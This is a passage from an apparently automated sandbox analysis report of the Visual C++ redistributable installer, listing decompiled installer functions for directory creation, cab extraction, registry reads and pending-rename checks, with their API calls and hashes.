                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                          • API String ID: 3168844106-2873099529
                                                                          • Opcode ID: c50e477045ea201a2b1c341aad16de260363d0e04c89ec1f71316edf6cc1a6ee
                                                                          • Instruction ID: a24ca4ec534f2fe82bcafab3e3bde0f0c0e38ea10f336332be704f8f7b6c7a60
                                                                          • Opcode Fuzzy Hash: c50e477045ea201a2b1c341aad16de260363d0e04c89ec1f71316edf6cc1a6ee
                                                                          • Instruction Fuzzy Hash: CA31A03290461EBBDF229B50CC06FEE7B65EF54320F104125FA086AA51D736AE60EBD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B4013 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E000B4013(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8) {
				int _t5;
				long _t7;
				short _t12;
				signed short _t14;
				short* _t17;
				WCHAR* _t19;
				WCHAR* _t21;
				short _t22;

				_t21 = _a4;
				_t22 = 0;
				_t5 = CreateDirectoryW(_t21, _a8); // executed
				if(_t5 != 0) {
					L17:
					return _t22;
				}
				_t7 = GetLastError();
				if(_t7 != 0xb7) {
					if(_t7 == 3 || E000B40E2(_t21, 0) == 0) {
						_t8 =  *_t21 & 0x0000ffff;
						_t19 = _t21;
						_t17 = 0;
						if(( *_t21 & 0x0000ffff) == 0) {
							L15:
							_t22 = 0x80070003;
							E000B37D3(_t8, "dirutil.cpp", 0x72, 0x80070003);
							goto L16;
						} else {
							_push(0x5c);
							do {
								_t17 =  ==  ? _t19 : _t17;
								_t19 =  &(_t19[1]);
								_t8 =  *_t19 & 0x0000ffff;
							} while (( *_t19 & 0x0000ffff) != 0);
							if(_t17 == 0) {
								goto L15;
							} else {
								 *_t17 = 0;
								_t22 = E000B4013(_t21, _a8);
								_t12 = 0x5c;
								 *_t17 = _t12;
								if(_t22 >= 0) {
									if(CreateDirectoryW(_t21, _a8) != 0) {
										_t22 = 0;
									} else {
										_t14 = GetLastError();
										if(_t14 != 0xb7) {
											_t22 =  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
										} else {
											_t22 = 1;
										}
									}
								}
								L16:
								goto L17;
							}
						}
					} else {
						goto L2;
					}
				}
				L2:
				_t22 = 0;
				goto L17;
			}











                                                                          0x000b401b
                                                                          0x000b401e
                                                                          0x000b4021
                                                                          0x000b4029
                                                                          0x000b40db
                                                                          0x000b40df
                                                                          0x000b40df
                                                                          0x000b402f
                                                                          0x000b403a
                                                                          0x000b4046
                                                                          0x000b4054
                                                                          0x000b4057
                                                                          0x000b405a
                                                                          0x000b405f
                                                                          0x000b40c7
                                                                          0x000b40c7
                                                                          0x000b40d4
                                                                          0x00000000
                                                                          0x000b4061
                                                                          0x000b4061
                                                                          0x000b4064
                                                                          0x000b4067
                                                                          0x000b406a
                                                                          0x000b406d
                                                                          0x000b4070
                                                                          0x000b4077
                                                                          0x00000000
                                                                          0x000b4079
                                                                          0x000b407f
                                                                          0x000b4087
                                                                          0x000b408b
                                                                          0x000b408c
                                                                          0x000b4091
                                                                          0x000b409f
                                                                          0x000b40c3
                                                                          0x000b40a1
                                                                          0x000b40a1
                                                                          0x000b40ac
                                                                          0x000b40be
                                                                          0x000b40ae
                                                                          0x000b40b0
                                                                          0x000b40b0
                                                                          0x000b40ac
                                                                          0x000b409f
                                                                          0x000b40d9
                                                                          0x00000000
                                                                          0x000b40d9
                                                                          0x000b4077
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b4046
                                                                          0x000b403c
                                                                          0x000b403c
                                                                          0x00000000

                                                                          APIs
                                                                          • CreateDirectoryW.KERNELBASE(00000003,00000001,00000000,00000000,?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000), ref: 000B4021
                                                                          • GetLastError.KERNEL32(?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000,?,000CA55D,?,00000000), ref: 000B402F
                                                                          • CreateDirectoryW.KERNEL32(00000003,00000001,00000001,?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000), ref: 000B4097
                                                                          • GetLastError.KERNEL32(?,000F416C,00000001,00000000,?,000F4203,00000003,00000001,00000001,00000000,00000000,00000000,?,000CA55D,?,00000000), ref: 000B40A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: @Met$dirutil.cpp
                                                                          • API String ID: 1375471231-1953925360
                                                                          • Opcode ID: b892fb3f3b91712c32c72e8ee6a3969a4ac0a693ae0544320d8323980a206ce3
                                                                          • Instruction ID: 7bc124b762216b01c43d06a94e5b15996426bd078ccae56b4ad50171dd5020b5
                                                                          • Opcode Fuzzy Hash: b892fb3f3b91712c32c72e8ee6a3969a4ac0a693ae0544320d8323980a206ce3
                                                                          • Instruction Fuzzy Hash: AC112735A10232A6EB303AA18C44BFBB6A4EF54760F104125FF05EB052D7348E01A6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D09B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E000D09B8(intOrPtr _a4, intOrPtr _a8) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				intOrPtr _t23;
				void* _t35;
				intOrPtr _t43;
				signed int _t44;

				_t43 = _a4;
				_t44 = 0;
				_v20.dwLowDateTime = 0;
				_v20.dwHighDateTime = 0;
				_v12.dwLowDateTime = 0;
				_v12.dwHighDateTime = 0;
				_t23 =  *((intOrPtr*)(_t43 + 0x2c));
				if(_t23 == 0) {
					if(DosDateTimeToFileTime( *(_a8 + 0x18) & 0x0000ffff,  *(_a8 + 0x1a) & 0x0000ffff,  &_v20) != 0 && LocalFileTimeToFileTime( &_v20,  &_v12) != 0) {
						SetFileTime( *(_t43 + 0x3c),  &_v12,  &_v12,  &_v12); // executed
					}
					if( *(_t43 + 0x3c) != 0xffffffff) {
						FindCloseChangeNotification( *(_t43 + 0x3c)); // executed
						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) | 0xffffffff;
					}
				} else {
					_t35 = _t23 - 1;
					if(_t35 != 0) {
						_t37 = _t35 == 0;
						if(_t35 == 0) {
							_t44 = 0x80004004;
						} else {
							_t44 = 0x8007139f;
							E000B37D3(_t37, "cabextract.cpp", 0x296, 0x8007139f);
							_push("Invalid operation for this state.");
							_push(0x8007139f);
							E000F012F();
						}
					}
				}
				 *(_t43 + 0x30) = _t44;
				_t20 = (_t44 >> 0x0000001f & 0xfffffffe) + 1; // 0x1
				return _t20;
			}









                                                                          0x000d09c0
                                                                          0x000d09c3
                                                                          0x000d09c5
                                                                          0x000d09c8
                                                                          0x000d09cb
                                                                          0x000d09d2
                                                                          0x000d09d5
                                                                          0x000d09d8
                                                                          0x000d0a2d
                                                                          0x000d0a4a
                                                                          0x000d0a4a
                                                                          0x000d0a54
                                                                          0x000d0a59
                                                                          0x000d0a5f
                                                                          0x000d0a5f
                                                                          0x000d09da
                                                                          0x000d09da
                                                                          0x000d09dd
                                                                          0x000d09e4
                                                                          0x000d09e7
                                                                          0x000d0a0d
                                                                          0x000d09e9
                                                                          0x000d09e9
                                                                          0x000d09f9
                                                                          0x000d09fe
                                                                          0x000d0a03
                                                                          0x000d0a04
                                                                          0x000d0a0a
                                                                          0x000d09e7
                                                                          0x000d09dd
                                                                          0x000d0a63
                                                                          0x000d0a6d
                                                                          0x000d0a74

                                                                          APIs
                                                                          • DosDateTimeToFileTime.KERNEL32 ref: 000D0A25
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000D0A37
                                                                          • SetFileTime.KERNELBASE(?,?,?,?), ref: 000D0A4A
                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000D0616,?,?), ref: 000D0A59
                                                                          Strings
                                                                          • cabextract.cpp, xrefs: 000D09F4
                                                                          • Invalid operation for this state., xrefs: 000D09FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$ChangeCloseDateFindLocalNotification
                                                                          • String ID: Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 1330928052-1751360545
                                                                          • Opcode ID: 182d42c620980e05d366b305b4db6ceaa7dd6637a67234caeaedd66da258d3ae
                                                                          • Instruction ID: a30a4300a6fc75328abbcaddff55c3b773d648cd983e1057ae1e7d9451de87f8
                                                                          • Opcode Fuzzy Hash: 182d42c620980e05d366b305b4db6ceaa7dd6637a67234caeaedd66da258d3ae
                                                                          • Instruction Fuzzy Hash: 4421CF7280071AABC750CFACCC489AA7BBCFF04720B544216F814D6AD0C775DA11CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F343B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 000F344A
                                                                          • InterlockedIncrement.KERNEL32(0011B6D8), ref: 000F3467
                                                                          • CLSIDFromProgID.OLE32(Msxml2.DOMDocument,0011B6C8,?,?,?,?,?,?), ref: 000F3482
                                                                          • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0011B6C8,?,?,?,?,?,?), ref: 000F348E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$IncrementInitializeInterlocked
                                                                          • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                          • API String ID: 2109125048-2356320334
                                                                          • Opcode ID: 601a353cd1c6ea9b29cb3b764a302a66ca63a90077e9fb9a69bd86509d3321ad
                                                                          • Instruction ID: d24b5bb9b3f3190dba481a6e9bb7c437e92e8fa5f1233987bf8136837b683fbd
                                                                          • Opcode Fuzzy Hash: 601a353cd1c6ea9b29cb3b764a302a66ca63a90077e9fb9a69bd86509d3321ad
                                                                          • Instruction Fuzzy Hash: 68F0E52074A23957D7668BA5ED4DF7B7EA5AB91FB4F000028EA00D1D94D364B9C1EEB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000CE705 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 92%
                                                                          			E000CE705(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				int _t22;
				void* _t24;
				long _t25;
				void* _t34;
				long _t36;
				long _t38;
				void* _t42;
				void* _t45;
				intOrPtr* _t47;
				signed int _t50;
				long _t53;

				_t22 = _a8;
				if(_t22 == 0) {
					PostQuitMessage(0);
					return 0;
				}
				_t24 = _t22 - 0xf;
				if(_t24 == 0) {
					_t42 = 0;
					_t50 = _a16 & 0x40000000;
					_t25 = GetWindowLongW(_a4, 0xffffffeb);
					_a4 = _t25;
					if( *_t25 == 0) {
						_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 4)) + 0x10));
						_t45 = 2;
						_t46 =  !=  ? 0 : _t45;
						 *((intOrPtr*)( *_t47 + 0x14))(_t47, _a16,  !=  ? 0 : _t45);
						_t42 = 0xbadbad;
					}
					_push(E000C3C30(_t42));
					_push(E000C3C30(_a4->i));
					E000B550F(2, 0x20000190, E000C3C30(_t50));
					return _t42;
				}
				_t53 = _a16;
				_t34 = _t24 - 0x70;
				if(_t34 == 0) {
					SetWindowLongW(_a4, 0xffffffeb,  *_t53);
					L6:
					_t36 = DefWindowProcW(_a4, _a8, _a12, _t53); // executed
					return _t36;
				}
				if(_t34 != 1) {
					goto L6;
				}
				_t38 = DefWindowProcW(_a4, 0x82, _a12, _t53);
				SetWindowLongW(_a4, 0xffffffeb, 0);
				return _t38;
			}














                                                                          0x000ce70d
                                                                          0x000ce710
                                                                          0x000ce7de
                                                                          0x00000000
                                                                          0x000ce7e4
                                                                          0x000ce716
                                                                          0x000ce719
                                                                          0x000ce774
                                                                          0x000ce77b
                                                                          0x000ce781
                                                                          0x000ce787
                                                                          0x000ce78c
                                                                          0x000ce797
                                                                          0x000ce79a
                                                                          0x000ce79b
                                                                          0x000ce7a5
                                                                          0x000ce7ab
                                                                          0x000ce7ab
                                                                          0x000ce7b4
                                                                          0x000ce7bf
                                                                          0x000ce7ce
                                                                          0x00000000
                                                                          0x000ce7d9
                                                                          0x000ce71b
                                                                          0x000ce71e
                                                                          0x000ce721
                                                                          0x000ce757
                                                                          0x000ce75d
                                                                          0x000ce767
                                                                          0x00000000
                                                                          0x000ce767
                                                                          0x000ce726
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000ce734
                                                                          0x000ce743
                                                                          0x00000000

                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000082,?,?), ref: 000CE734
                                                                          • SetWindowLongW.USER32 ref: 000CE743
                                                                          • SetWindowLongW.USER32 ref: 000CE757
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 000CE767
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 000CE781
                                                                          • PostQuitMessage.USER32(00000000), ref: 000CE7DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Proc$MessagePostQuit
                                                                          • String ID:
                                                                          • API String ID: 3812958022-0
                                                                          • Opcode ID: 107f8c68ec49f59f72848a7fa08b1ca0708d7f5895db99596c11860872e3c630
                                                                          • Instruction ID: e04839e896fb24cba65dce0ee67a359b5f40c951070deb3989579ada1aa521bf
                                                                          • Opcode Fuzzy Hash: 107f8c68ec49f59f72848a7fa08b1ca0708d7f5895db99596c11860872e3c630
                                                                          • Instruction Fuzzy Hash: 9F217132118118BFEB215FA4DD49FAE3BA9EF45351F148628F906AA1B1C731DE10EB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F10C5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149registrystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 91%
                                                                          			E000F10C5(void* _a4, short* _a8, signed int* _a12, signed int* _a16) {
				int* _v8;
				int _v12;
				int _v16;
				signed short _t44;
				void* _t47;
				int* _t51;
				long _t71;
				signed int _t72;
				signed int _t73;
				signed short _t75;
				unsigned int _t79;
				unsigned int _t80;
				unsigned int _t81;
				WCHAR* _t82;
				void* _t86;
				void* _t87;
				void* _t88;

				_v16 = 0;
				_t72 = 0;
				_v12 = 0;
				_t81 = 0;
				_v8 = 0;
				_t44 = RegQueryValueExW(_a4, _a8, 0,  &_v16, 0,  &_v12); // executed
				_t79 = _v12;
				_t75 = _t44;
				if(_t79 == 0) {
					L3:
					_t86 = 0x80070002;
					_t47 =  <=  ? _t75 : _t75 & 0x0000ffff | 0x80070000;
					if(_t47 != 0x80070002) {
						if(_t75 == 0) {
							_t80 = _t79 >> 1;
							if(_t80 == _t81) {
								if(_v16 == 7) {
									if(_t81 >= 2) {
										_t51 = _v8;
										if(0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 2)) || 0 !=  *((intOrPtr*)(_t51 + _t81 * 2 - 4))) {
											_t86 = 0x80070057;
										} else {
											_t87 = 0;
											if(_t80 != 0) {
												do {
													_t87 = _t87 + 1;
													_t29 = _t72 + 1; // 0x1
													_t63 =  !=  ? _t72 : _t29;
													_t72 =  !=  ? _t72 : _t29;
												} while (_t87 < _t80);
											}
											_t31 = _t72 - 1; // 0x0
											_t52 = _t31;
											 *_a16 = _t31;
											_t86 = E000B38F6(_t31, _a16, _a12, _t52, 4, 0);
											if(_t86 >= 0) {
												_t73 = 0;
												_t82 = _v8;
												if( *_a16 > 0) {
													while(1) {
														_t86 = E000B21A5( *_a12 + _t73 * 4, _t82, 0);
														if(_t86 < 0) {
															goto L23;
														}
														_t82 =  &(( &(_t82[lstrlenW(_t82)]))[1]);
														_t73 = _t73 + 1;
														if(_t73 <  *_a16) {
															continue;
														} else {
														}
														goto L23;
													}
												}
											}
										}
									} else {
										 *_a12 =  *_a12 & _t72;
										 *_a16 =  *_a16 & _t72;
										_t86 = 0;
									}
								} else {
									_t86 = 0x8007070c;
									_push(0x8007070c);
									_push(0x225);
									goto L6;
								}
							} else {
								_t86 = 0x8000ffff;
							}
						} else {
							_t88 = _t47;
							_t47 = 0x80004005;
							_t86 =  >=  ? 0x80004005 : _t88;
							_push(_t86);
							_push(0x21a);
							L6:
							_push("regutil.cpp");
							E000B37D3(_t47);
						}
					}
				} else {
					_t81 = _t79 >> 1;
					_t86 = E000B1EDE( &_v8, _t81);
					if(_t86 >= 0) {
						_t71 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _v8,  &_v12); // executed
						_t79 = _v12;
						_t75 = _t71;
						goto L3;
					}
				}
				L23:
				_t48 = _v8;
				if(_v8 != 0) {
					E000F54EF(_t48);
				}
				return _t86;
			}




















                                                                          0x000f10d8
                                                                          0x000f10e0
                                                                          0x000f10e2
                                                                          0x000f10e8
                                                                          0x000f10ea
                                                                          0x000f10ed
                                                                          0x000f10f3
                                                                          0x000f10f6
                                                                          0x000f10fa
                                                                          0x000f1131
                                                                          0x000f1134
                                                                          0x000f1140
                                                                          0x000f1145
                                                                          0x000f114d
                                                                          0x000f1170
                                                                          0x000f1174
                                                                          0x000f1184
                                                                          0x000f1196
                                                                          0x000f11a9
                                                                          0x000f11b3
                                                                          0x000f1230
                                                                          0x000f11bc
                                                                          0x000f11bc
                                                                          0x000f11c0
                                                                          0x000f11c2
                                                                          0x000f11cb
                                                                          0x000f11cf
                                                                          0x000f11d2
                                                                          0x000f11d5
                                                                          0x000f11d7
                                                                          0x000f11c2
                                                                          0x000f11de
                                                                          0x000f11de
                                                                          0x000f11e9
                                                                          0x000f11f0
                                                                          0x000f11f4
                                                                          0x000f11f9
                                                                          0x000f11fb
                                                                          0x000f1200
                                                                          0x000f1202
                                                                          0x000f1213
                                                                          0x000f1217
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f1226
                                                                          0x000f1229
                                                                          0x000f122c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f122e
                                                                          0x00000000
                                                                          0x000f122c
                                                                          0x000f1202
                                                                          0x000f1200
                                                                          0x000f11f4
                                                                          0x000f1198
                                                                          0x000f119b
                                                                          0x000f11a0
                                                                          0x000f11a2
                                                                          0x000f11a2
                                                                          0x000f1186
                                                                          0x000f1186
                                                                          0x000f118b
                                                                          0x000f118c
                                                                          0x00000000
                                                                          0x000f118c
                                                                          0x000f1176
                                                                          0x000f1176
                                                                          0x000f1176
                                                                          0x000f114f
                                                                          0x000f114f
                                                                          0x000f1151
                                                                          0x000f1158
                                                                          0x000f115b
                                                                          0x000f115c
                                                                          0x000f1161
                                                                          0x000f1161
                                                                          0x000f1166
                                                                          0x000f1166
                                                                          0x000f114d
                                                                          0x000f10fc
                                                                          0x000f1101
                                                                          0x000f110a
                                                                          0x000f110e
                                                                          0x000f1126
                                                                          0x000f112c
                                                                          0x000f112f
                                                                          0x00000000
                                                                          0x000f112f
                                                                          0x000f110e
                                                                          0x000f1235
                                                                          0x000f1235
                                                                          0x000f123a
                                                                          0x000f123d
                                                                          0x000f123d
                                                                          0x000f124a

                                                                          APIs
                                                                          • RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000F10ED
                                                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,000C6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 000F1126
                                                                          • lstrlenW.KERNEL32(?,?,-00000001,00000004,00000000), ref: 000F121A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$lstrlen
                                                                          • String ID: BundleUpgradeCode$regutil.cpp
                                                                          • API String ID: 3790715954-1648651458
                                                                          • Opcode ID: 8c9416771dc1232f34534b04c1c71429bd713aaaac978c6b3429ecce67e61439
                                                                          • Instruction ID: 72010e5996143942323ee5b36d776a9652a2c49e7c44d55b6362fae7073385c9
                                                                          • Opcode Fuzzy Hash: 8c9416771dc1232f34534b04c1c71429bd713aaaac978c6b3429ecce67e61439
                                                                          • Instruction Fuzzy Hash: 1941BE31A0021EEBDB258F98C884AFEB7B9FF48710F114169EA15EB610D635DD11ABA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000F4212 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000F4212(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _t29;
				void* _t34;
				void* _t37;
				signed short* _t39;
				signed int _t42;
				void* _t44;
				void* _t45;
				signed int _t49;
				void* _t50;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_t29 = E000F4315(_a4, _a8); // executed
				_t50 = _t29;
				if(_t50 == 0) {
					L21:
					if(_v12 != 0) {
						E000B2647(_v12, _v8);
					}
					if(_v16 != 0) {
						RegCloseKey(_v16);
					}
					return _t50;
				}
				_t34 = E000F0E3F(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 1,  &_v16);
				if(_t34 == 0x80070002 || _t34 < 0) {
					L20:
					goto L21;
				} else {
					_t37 = E000F10C5(_v16, L"PendingFileRenameOperations",  &_v12,  &_v8);
					if(_t37 != 0x80070002 && _t37 >= 0) {
						_t49 = 0;
						if(_v8 <= 0) {
							goto L20;
						}
						_a8 = 0x5c;
						_t45 = 0x3f;
						do {
							_t39 =  *(_v12 + _t49 * 4);
							if(_t39 == 0) {
								goto L17;
							}
							_t42 =  *_t39 & 0x0000ffff;
							if(_t42 == 0) {
								goto L17;
							}
							if(_a8 == _t42 && _t45 == _t39[1] && _t45 == _t39[2]) {
								_t44 = 0x5c;
								if(_t44 == _t39[3]) {
									_t39 =  &(_t39[4]);
								}
							}
							if(E000B2D05( &_v20, _a4, _t39,  &_v20) < 0) {
								goto L20;
							} else {
								if(_v20 == 2) {
									_t50 = 0;
									goto L20;
								}
								_t45 = 0x3f;
							}
							L17:
							_t49 = _t49 + 2;
						} while (_t49 < _v8);
					}
					goto L20;
				}
			}
















                                                                          0x000f4222
                                                                          0x000f4225
                                                                          0x000f4228
                                                                          0x000f422b
                                                                          0x000f422e
                                                                          0x000f4233
                                                                          0x000f4237
                                                                          0x000f42ed
                                                                          0x000f42f0
                                                                          0x000f42f8
                                                                          0x000f42f8
                                                                          0x000f4300
                                                                          0x000f4305
                                                                          0x000f4305
                                                                          0x000f4312
                                                                          0x000f4312
                                                                          0x000f424e
                                                                          0x000f425a
                                                                          0x000f42ec
                                                                          0x00000000
                                                                          0x000f4268
                                                                          0x000f4278
                                                                          0x000f427f
                                                                          0x000f4285
                                                                          0x000f428a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f428e
                                                                          0x000f4295
                                                                          0x000f4296
                                                                          0x000f4299
                                                                          0x000f429e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f42a0
                                                                          0x000f42a6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000f42ac
                                                                          0x000f42bc
                                                                          0x000f42c1
                                                                          0x000f42c3
                                                                          0x000f42c3
                                                                          0x000f42c1
                                                                          0x000f42d5
                                                                          0x00000000
                                                                          0x000f42d7
                                                                          0x000f42db
                                                                          0x000f42ea
                                                                          0x00000000
                                                                          0x000f42ea
                                                                          0x000f42df
                                                                          0x000f42df
                                                                          0x000f42e0
                                                                          0x000f42e0
                                                                          0x000f42e3
                                                                          0x000f42e8
                                                                          0x00000000
                                                                          0x000f427f

                                                                          APIs
                                                                            • Part of subcall function 000F4315: FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 000F4350
                                                                            • Part of subcall function 000F4315: FindClose.KERNEL32(00000000), ref: 000F435C
                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 000F4305
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                            • Part of subcall function 000F10C5: RegQueryValueExW.KERNELBASE(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000F10ED
                                                                            • Part of subcall function 000F10C5: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,?,?,?,?,000C6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 000F1126
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFindQueryValue$FileFirstOpen
                                                                          • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                          • API String ID: 3397690329-3978359083
